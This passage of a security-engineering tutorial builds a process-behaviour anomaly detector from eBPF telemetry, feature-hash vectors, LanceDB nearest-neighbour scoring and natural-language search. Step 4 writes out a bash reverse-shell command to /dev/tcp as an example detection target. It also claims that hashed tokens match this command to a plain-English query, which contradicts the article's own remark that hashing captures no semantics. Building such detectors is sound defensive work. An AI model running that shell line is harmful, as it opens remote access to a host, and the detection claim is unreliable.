[0; 128],
timestamp_ns: bpf_ktime_get_ns(),
};
if let Ok(comm) = bpf_get_current_comm() {
snapshot.comm = comm;
}
// Read cmdline from userspace memory safely
let _ = bpf_probe_read_user_str(&mut snapshot.cmdline, ctx.arg(1));
emit_to_ringbuf(&snapshot);
0
}
**Architecture Rationale:** eBPF requires kernel ≥ 5.8 with BTF (BPF Type Format) enabled for zero-instrumentation deployment. For legacy environments, the agent falls back to polling `/proc/[pid]/cmdline` and `/proc/[pid]/status` at fixed intervals. This dual-path design ensures telemetry continuity without sacrificing accuracy on modern kernels.
### Step 2: Deterministic Vector Representation
Raw process telemetry cannot be compared directly. We convert each execution event into a fixed-length numerical vector using feature hashing. This technique tokenizes structured fields, hashes each token to a vector index, and accumulates signed contributions. The result is normalized to unit length, enabling cosine distance calculations.
```typescript
// vectorizer.ts
import { createHash } from 'crypto';
/**
 * One process-execution event, as consumed by computeBehaviorVector().
 */
interface TelemetryEvent {
// Hashed as a single (untokenized) feature; evaluateAndLearn() also stores it under the `pid` column.
processName: string;
// Hashed as a single (untokenized) feature; an empty string is skipped by the vectorizer.
parentName: string;
// Stringified and hashed as a single feature.
uid: number;
// Optional; the vectorizer substitutes 0 when absent.
localPort?: number;
// Optional; the vectorizer substitutes 0 when absent.
remotePort?: number;
// Split into lowercase tokens by tokenize() before hashing.
cmdline: string;
}
/**
 * Breaks a string into lowercase tokens.
 *
 * The input is lowercased, then cut on runs of whitespace, `/`, `=`, `-`,
 * `_` and `.`. Pieces of length 0 or 1 are dropped.
 *
 * @param input - Raw text (for example a command line).
 * @returns The surviving tokens in their original order.
 */
function tokenize(input: string): string[] {
  const delimiterRun = /[\s/=\-_.]+/;
  const kept: string[] = [];
  for (const piece of input.toLowerCase().split(delimiterRun)) {
    if (piece.length > 1) {
      kept.push(piece);
    }
  }
  return kept;
}
/**
 * Converts a telemetry event into a 128-dimensional, L2-normalized
 * feature-hash vector.
 *
 * Every feature is hashed as `<namespace>:<value>`, where the namespace
 * identifies the FIELD the value came from (`proc`, `parent`, `uid`, `lport`,
 * `rport`, `cmd`). Command-line tokens all share the `cmd` namespace, so a
 * token lands in the same bucket no matter where it appears in the command
 * line. Salting with the token's array position instead would move every
 * later token to a different bucket as soon as one argument is added,
 * removed or reordered, making near-identical commands look unrelated.
 *
 * NOTE: the namespace labels and DIMENSIONS define the vector space. Changing
 * either changes every output vector, so vectors produced under a different
 * scheme are not comparable with these.
 *
 * @param event - The execution event to vectorize.
 * @returns A unit-length vector, or the all-zero vector when no feature is
 *   non-empty.
 */
function computeBehaviorVector(event: TelemetryEvent): Float32Array {
  const DIMENSIONS = 128;
  const vec = new Float32Array(DIMENSIONS);

  const features: Array<[string, string]> = [
    ['proc', event.processName],
    ['parent', event.parentName],
    ['uid', String(event.uid)],
    ['lport', String(event.localPort ?? 0)],
    ['rport', String(event.remotePort ?? 0)],
    ...tokenize(event.cmdline).map((t): [string, string] => ['cmd', t]),
  ];

  for (const [namespace, rawValue] of features) {
    const value = rawValue.trim();
    if (!value) continue; // empty fields contribute nothing

    const digest = createHash('md5').update(`${namespace}:${value}`).digest();
    // Byte 0 picks the bucket (0..255 folds evenly onto 128 buckets);
    // the low bit of byte 1 picks the sign of the contribution.
    const idx = digest[0] % DIMENSIONS;
    const sign = (digest[1] & 1) ? 1 : -1;
    vec[idx] += sign;
  }

  // L2 normalization; `|| 1` leaves an all-zero vector untouched instead of
  // dividing by zero.
  let magnitude = 0;
  for (let i = 0; i < DIMENSIONS; i++) magnitude += vec[i] ** 2;
  magnitude = Math.sqrt(magnitude) || 1;
  for (let i = 0; i < DIMENSIONS; i++) vec[i] /= magnitude;

  return vec;
}
```

#### Why Feature Hashing Over Neural Embeddings?
Neural models like all-MiniLM-L6-v2 (384 dimensions, ~22 MB) or OpenAI's text-embedding-3-small provide richer semantic understanding. They recognize that `sh` and `bash` are related shells, or that `/tmp` and `/dev/shm` share similar risk profiles. However, at fleet scale, the operational cost becomes prohibitive. A 50-server environment generating ~3,000 events hourly requires either local model inference (adding 5–20 ms CPU latency and ~200 MB disk overhead per backend instance) or external API calls (introducing network latency, per-request costs, and single-point-of-failure risk).
Feature hashing executes in <0.1 ms, requires zero external dependencies, and produces deterministic outputs. The same command line always maps to the same vector, simplifying testing and debugging. The vectorization layer is intentionally isolated behind a single function. Swapping to a neural embedding model later requires only updating computeBehaviorVector(); downstream scoring and storage remain unaffected.
### Step 3: Embedded Storage & Anomaly Scoring
Vectors are stored in LanceDB, an embedded vector database that runs in-process and persists to disk. Each workload receives an isolated table. New events are scored against historical neighbors before being appended to the baseline.
// behaviorEngine.ts
import { LanceDBClient, Table } from 'lancedb';
const SCORING_WINDOW = 10; // k-nearest neighbors
const PRUNE_DAYS = 7;
/**
 * Scores an event against the workload's stored baseline, then appends the
 * event to that baseline.
 *
 * The score is twice the smallest cosine distance to the nearest stored
 * neighbors, clamped to [0, 1]. It stays at 1.0 when the table returns no
 * neighbors or no neighbor yields a usable (non-NaN) distance.
 *
 * @param orgId - Tenant identifier; first half of the table name.
 * @param workload - Workload identifier; second half of the table name.
 * @param event - The execution event to score and learn.
 * @returns The anomaly score in [0, 1].
 */
export async function evaluateAndLearn(
  orgId: string,
  workload: string,
  event: TelemetryEvent
): Promise<number> {
  const db = await LanceDBClient.connect('./data/lancedb');
  const tableName = `${orgId}__${workload}`;
  // NOTE(review): presumably openTable rejects when the table does not exist,
  // so the first event of a new workload would fail here — confirm that the
  // table is created elsewhere before first ingestion.
  const table: Table = await db.openTable(tableName);
  const vector = computeBehaviorVector(event);

  // Query historical baseline
  const neighbors = await table
    .search(vector)
    .limit(SCORING_WINDOW)
    .toArray();

  let anomalyScore = 1.0; // Default: completely unseen
  if (neighbors.length > 0) {
    // A NaN distance fails the `<` comparison and is ignored, so it cannot
    // poison the score.
    let minDistance = Infinity;
    for (const n of neighbors) {
      const distance = cosineDistance(vector, Array.from(n.vector));
      if (distance < minDistance) minDistance = distance;
    }
    // Clamp on both sides: rounding can make a distance marginally negative.
    anomalyScore = Math.min(1.0, Math.max(0, minDistance * 2.0));
  }

  // Persist to baseline
  // NOTE(review): the `pid` column holds the process NAME, not a numeric PID.
  // The key is kept as-is because it is part of the stored row shape.
  await table.add([{
    vector,
    ts: Date.now(),
    pid: event.processName,
    cmdline: event.cmdline
  }]);

  // Prune stale entries in the background. The result is deliberately not
  // awaited, but a failure must be caught here: an unhandled promise
  // rejection would otherwise escape this function.
  void (async () => {
    try {
      await pruneOldEntries(table, PRUNE_DAYS);
    } catch (err: unknown) {
      console.warn(`pruneOldEntries failed for table ${tableName}`, err);
    }
  })();

  return anomalyScore;
}
/**
 * Cosine distance (1 - cosine similarity) between two vectors.
 *
 * The cosine is clamped to [-1, 1] before subtracting, so the result is
 * always within [0, 2]. Without the clamp, floating-point rounding in
 * `sqrt(normA) * sqrt(normB)` can push the cosine of two identical vectors
 * just above 1 and yield a tiny negative distance.
 *
 * Iteration runs over `a.length`. If `b` is shorter, the missing components
 * read as `undefined` and the result is NaN; extra components of `b` are
 * ignored.
 *
 * @param a - First vector.
 * @param b - Second vector.
 * @returns The distance in [0, 2]; 1 when either vector has zero magnitude.
 */
function cosineDistance(a: Float32Array, b: number[]): number {
  let dot = 0;
  let normA = 0;
  let normB = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i];
    normA += a[i] ** 2;
    normB += b[i] ** 2;
  }
  // `|| 1` avoids dividing by zero when either vector has zero magnitude.
  const denominator = Math.sqrt(normA) * Math.sqrt(normB) || 1;
  const cosine = Math.min(1, Math.max(-1, dot / denominator));
  return 1 - cosine;
}
**Architecture Rationale:** LanceDB eliminates the need for external vector infrastructure (Pinecone, Weaviate, Milvus). It supports approximate nearest-neighbor (ANN) search natively, scales to millions of vectors per table, and compacts data automatically. Anomaly scores range from 0 (highly familiar) to 1 (completely novel). Scores are forwarded to ClickHouse for long-term retention, aggregation, and alerting.
### Step 4: Natural Language Behavioral Search
Because every process execution is represented as a vector, querying by intent becomes trivial. The same tokenization and hashing pipeline converts natural language descriptions into vectors. A nearest-neighbor search across workload tables returns execution patterns that semantically match the query, regardless of literal keyword matches.
// searchInterface.ts
/**
 * Searches every workload table of one organization for stored events whose
 * vectors are closest to the vectorized query text.
 *
 * Tables are selected by the exact `<orgId>__` prefix. Matching on the bare
 * `orgId` would also select tables of any other organization whose id merely
 * starts with the same characters (e.g. `acme` vs `acme2__web`).
 * NOTE(review): this assumes an orgId never contains `__` itself — confirm.
 *
 * @param query - Free-text description; used both as the process name and as
 *   the command line of a synthetic event.
 * @param orgId - Tenant whose tables are searched.
 * @returns Up to 5 hits per table, merged and sorted by ascending `_distance`.
 *   NOTE(review): the rows are returned as they come back from the table
 *   search; nothing here maps them to the declared `{ event, score }` shape —
 *   verify against callers.
 */
export async function searchBehavioralPatterns(
  query: string,
  orgId: string
): Promise<Array<{ event: TelemetryEvent; score: number }>> {
  // Declared (not asserted) so the compiler checks the literal against the interface.
  const queryEvent: TelemetryEvent = {
    processName: query,
    parentName: '',
    uid: 0,
    cmdline: query
  };
  const queryVector = computeBehaviorVector(queryEvent);

  const db = await LanceDBClient.connect('./data/lancedb');
  const tablePrefix = `${orgId}__`;
  const allTables = await db.tableNames();
  const orgTables = allTables.filter((t: string) => t.startsWith(tablePrefix));

  // The per-table searches are independent, so run them in parallel.
  const hitsPerTable = await Promise.all(
    orgTables.map(async (name: string) => {
      const table = await db.openTable(name);
      return table.search(queryVector).limit(5).toArray();
    })
  );

  const results: any[] = hitsPerTable.flat();
  return results.sort((a, b) => a._distance - b._distance);
}
A query like "reverse shell outbound connection" will match `bash -i >& /dev/tcp/10.0.0.1/4444 0>&1` because the token distribution overlaps significantly in vector space, even though the literal words differ.
Pitfall Guide
1. Ignoring Kernel Version Requirements
Explanation: eBPF tracepoint attachment requires kernel ≥ 5.8 with BTF enabled. Deploying the eBPF agent on older kernels causes silent failures or crashes.
Fix: Implement a runtime capability check. If BTF is unavailable, automatically switch to /proc polling mode and log a warning. Never assume kernel version matches OS release.
2. Vector Space Pollution from High-Cardinality Fields
Explanation: Including raw PIDs, timestamps, or ephemeral ports in the feature set creates sparse, non-reusable vectors. Two identical commands with different PIDs will appear unrelated.
Fix: Strip or normalize dynamic fields before hashing. Use static identifiers (process name, parent, UID, fixed ports) and discard monotonically increasing values.
3. Unbounded Vector Table Growth
Explanation: Appending every execution event indefinitely causes LanceDB tables to grow unmanageably, degrading ANN search performance and increasing disk usage.
Fix: Implement time-based pruning. Retain only the last 7 days of vectors per workload. Run compaction jobs during low-traffic windows to reclaim space.
4. Over-Reliance on Raw Command-Line Strings
Explanation: Command lines contain variable arguments, temporary file paths, and randomized flags. Hashing raw strings reduces similarity matching accuracy.
Fix: Tokenize and normalize paths. Replace /tmp/tmp.XYZ123 with /tmp/tmp.*, strip randomized query parameters, and collapse repeated flags before vectorization.
5. Missing Parent-Process Context
Explanation: A process like python3 script.py executed by cron behaves differently than when executed by an interactive shell. Ignoring parent context increases false positives.
Fix: Always include parentName in the feature set. Weight parent context higher in the hashing pipeline to distinguish automated vs. manual execution origins.
6. Blocking Ingestion on Vector Search
Explanation: Synchronous k-NN queries during high-throughput periods create backpressure, delaying telemetry delivery and causing ring buffer overflows.
Fix: Decouple ingestion from scoring. Write raw events to a message queue, process scoring asynchronously, and batch LanceDB writes. Use read replicas or in-memory caches for hot baselines.
7. Hardcoding Anomaly Thresholds
Explanation: A single threshold (e.g., 0.7) fails across environments. Production workloads require stricter detection, while development environments tolerate higher noise.
Fix: Make thresholds configurable per workload. Store threshold mappings in a centralized config service. Allow dynamic adjustment without agent restarts.
Production Bundle
Action Checklist
Decision Matrix
| Scenario | Recommended Approach | Why | Cost Impact |
|---|---|---|---|
| Fleet size < 50 servers, modern kernels | eBPF + Feature Hashing | Low overhead, deterministic, zero external dependencies | Minimal (CPU < 1%, storage ~50MB/server) |
| Fleet size > 200 servers, mixed kernels | /proc fallback + Feature Hashing | Ensures coverage across legacy systems without eBPF complexity | Moderate (higher polling overhead, ~2-3% CPU) |
| Need semantic search for plain-English queries | Swap to all-MiniLM-L6-v2 locally | Captures shell/path semantics, improves NL search accuracy | High (~200MB RAM/disk, 5-20ms latency per event) |
| Multi-tenant SaaS with strict isolation | External Vector DB (Milvus/Weaviate) | Better multi-tenancy, scaling, and access control | High (infrastructure cost, network latency) |
| On-prem air-gapped environment | LanceDB + Feature Hashing | Fully embedded, no external API calls, deterministic | Low (self-contained, no licensing) |
Configuration Template
```yaml
# telemetry-agent-config.yaml
telemetry:
  capture_mode: auto # auto | eBPF | proc
  min_kernel_version: "5.8"
  btf_required: true
  batch_interval_seconds: 60
  proc_poll_interval_ms: 5000
vectorization:
  dimensions: 128
  normalization: l2
  tokenizer_pattern: "[\\s/=_\\-.]+"
  strip_dynamic_fields: true
  dynamic_field_regex: "\\b\\d{4,}\\b|tmp\\.[A-Za-z0-9]+"
scoring:
  k_neighbors: 10
  distance_metric: cosine
  score_scale_factor: 2.0
  default_threshold: 0.75
storage:
  backend: lancedb
  path: "./data/lancedb"
  prune_after_days: 7
  compaction_schedule: "0 3 * * 0"
output:
  clickhouse_endpoint: "http://clickhouse:8123"
  clickhouse_table: "security.behavioral_events"
  partition_key: "date"
  retry_policy:
    max_attempts: 3
    backoff_ms: 1000
```
Quick Start Guide
- Deploy the telemetry agent: Install the agent on target servers. The runtime automatically detects kernel capabilities and selects eBPF or `/proc` mode.
- Initialize vector storage: Start the backend service. LanceDB creates per-workload tables on first event ingestion. No manual schema definition required.
- Configure thresholds: Set baseline anomaly thresholds per environment in the configuration file. Production workloads typically use 0.6–0.7; development uses 0.8–0.9.
- Verify baseline formation: Monitor ClickHouse for incoming `anomaly_score` values. After 24–48 hours, familiar processes should stabilize near 0.0–0.1.
- Test behavioral search: Query the search interface with natural language descriptions. Validate that returned events match expected execution patterns without keyword dependency.